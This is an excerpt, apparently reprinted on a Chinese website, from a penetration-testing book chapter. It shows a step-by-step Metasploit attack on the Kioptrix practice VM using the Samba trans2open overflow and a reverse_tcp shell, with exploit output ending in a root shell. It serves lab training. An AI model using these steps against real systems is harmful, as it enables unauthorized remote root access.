4.6.3 使用Metasploit对Kioptrix进行漏洞利用
本文关键词:高度安全环境下的高级渗透测试,由笔耕文化传播整理发布。
> 高度安全环境下的高级渗透测试 4.6.3 使用Metasploit对Kioptrix进行漏洞利用 2014-09-04 16:52:23 我要投稿
本文所属图书 > 高度安全环境下的高级渗透测试
本书是一本介绍高级安全渗透测试的安全技术图书,采用步骤方式讲解了在安全环境下进行渗透测试的相关技术、工具和知识。本书分为11章,分别讲解了如何计划和界定一次成功的渗透测试,用来进行侦查以求获取信息的 立即去当当网订购
现在是时候介绍如何使用Metasploit来攻击我们的Kioptrix虚拟机了。我们已经学会了如何对网上提供的POC代码进行编译和使用,现在来看看Metasploit中的实现方式,这样能节约大量的时间。首先我们需要连接到数据库。
# msfconsole
msf > db_connect postgres:myPassword@127.0.0.1/pentester
在数据库中我们已经获得了目标系统的相关信息。你可以使用services命令查看:
msf > services
命令的输出结果如下:
Services ======== host port proto name state info ---- ---- ----- ---- ----- ---- 192.168.75.14 22 tcp ssh open 192.168.75.14 80 tcp http open 192.168.75.14 111 udp rpcbind open 192.168.75.14 111 tcp rpcbind open 192.168.75.14 137 udp netbios-ns open 192.168.75.14 139 tcp netbios-ssn open 192.168.75.14 443 tcp https open 192.168.75.14 32768 tcp filenet-tms open 192.168.75.14 32768 udp omad open可以看到我们先前利用的samba 139端口仍然开放。现在来看看在不必处理漏洞利用代码的情况下,我们使用Metasploit能做的事情。
msf> search samba
结果如图4.13所示。
模块名:确定需要使用的漏洞利用模块之后,可以使用USE命令后接模块名来进行使用。
发布时间:发布时间是社区或厂商获得漏洞信息的实际时间,而不是相关POC代码的发布时间。
排名:漏洞的排名非常重要,可以获得漏洞可靠程度的信息。
描述:描述漏洞的类型。
我们将使用 trans2open 漏洞利用模块,,其使用与本章之前介绍的扫描模块类似。在msfconsole中输入:
msf > use exploit/linux/samba/trans2open
我们可能需要了解模块的更多信息,这时可以使用info命令来显示:
msf exploit(trans2open) > info Name: Samba trans2open Overflow (Linux x86) Module: exploit/linux/samba/trans2open Version: 12196 Platform: Linux Privileged: Yes License: Metasploit Framework License (BSD) Rank: Great Provided by: hdm <hdm@metasploit.com> jduck <jduck@metasploit.com> Available targets: Id Name -- ---- 0 Samba 2.2.x - Bruteforce Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- RHOST yes The target address RPORT 139 yes The target port Payload information: Space: 1024 Avoid: 1 characters Description: This exploits the buffer overflow found in Samba versions 2.2.0 to 2.2.8. This particular module is capable of exploiting the flaw on x86 Linux systems that do not have the noexec stack option set. NOTE: Some older versions of RedHat do not seem to be vulnerable since they apparently do not allow anonymous access to IPC. References: ?name=2003-0201Metasploit的所有漏洞利用模块都有类似的信息。如果时间允许,应该多花时间熟悉一下常用的漏洞利用模块,以避免使用的模块在目标系统环境下不起作用的情况发生。
现在我们需要设置一些选项:
msf > set RHOST 192.168.75.14
RHOST是远程目标主机,我们将其设置为Kioptrix虚拟机的IP地址。
msf > show payloads
如图4.14所示,show payloads 命令显示可供当前模块使用的所有攻击载荷的列表。这里我们以使用reverse_tcp为例。这种攻击载荷短小而有效,但不具备像Meterpreter那样强大的功能。
> set payload linux/x86/shell/reverse_tcp
我们同样需要设置LHOST和LPORT。
> set LHOST 192.168.75.12
这是我们需要监听的本地地址。
> set LPORT 2222
这里设置为需要监听的端口。
现在设置已经完成,我们可以执行模块:
> exploit
如果一切按计划进行,你将看到如下的输出信息,然后获得类似于本章之前手动编译漏洞利用代码时获得的Shell会话连接。
msf exploit(trans2open) > exploit [*] Started reverse handler on 192.168.75.12:2221 [*] Trying return address 0xbffffdfc... [*] Trying return address 0xbffffcfc... [*] Trying return address 0xbffffbfc... [*] Trying return address 0xbffffafc... [*] Sending stage (36 bytes) to 192.168.75.14 [*] Command shell session 2 opened (192.168.75.12:2221 -> 192.168.75.14:32802) at 2011-11-16 23:22:06 -0500执行下面的指令,以确保我们拥有root权限:
# mail Mail version 8.1 6/6/93.Type ? for help. "/var/mail/root": 6 messages 6 unread >U 1 root@kioptix.level1 Sat Sep 26 11:42 15/481 "About Level 2" U 2 root@kioptrix.level1 Thu Nov 10 19:34 19/534 "LogWatch for kioptrix" U 3 root@kioptrix.level1 Fri Nov 11 14:38 48/1235 "LogWatch for kioptrix" U 4 root@kioptrix.level1 Sun Nov 13 15:12 19/534 "LogWatch for kioptrix" U 5 root@kioptrix.level1 Mon Nov 14 18:23 244/12279 "LogWatch for kioptrix" U 6 root@kioptrix.level1 Wed Nov 16 15:19 19/534 "LogWatch for kioptrix"在给root账号的留言中,可以看到Loneferret给我们留言的一条好消息,输入1读取:
# 1 Message 1: From root Sat Sep 26 11:42:10 2009 Date:Sat, 26 Sep 2009 11:42:10 -0400 From: root <root@kioptix.level1> To: root@kioptix.level1 Subject:About Level 2 If you are reading this, you got root.Congratulations. Level 2 won't be as easy...从最后的这项练习可以清楚地看到,相比手动查找和编译代码,使用Metasploit是多么轻而易举的一件事情。你甚至还能将你自己的模块和编译的代码添加到Metasploit框架中。
点击复制链接 与好友分享!回本站首页 您对本文章有什么意见或着疑问吗?请到论坛讨论您的关注和建议是我们前行的参考和动力 上一篇:4.6.2 Metasploit和数据库 下一篇:4.7 总结 相关文章内核漏洞的利用与防范
内存破坏漏洞
内核栈漏洞
内核堆漏洞
1.2.1 计算机漏洞的性质
1.2.2 计算机漏洞分类
漏洞管理
1.2 漏洞管理的起源
1.5 漏洞的来源
1.6 有缺陷的漏洞管理示例
图文推荐本文关键词:高度安全环境下的高级渗透测试,由笔耕文化传播整理发布。
本文编号:289669
本文链接:https://www.wllwen.com/wenshubaike/mishujinen/289669.html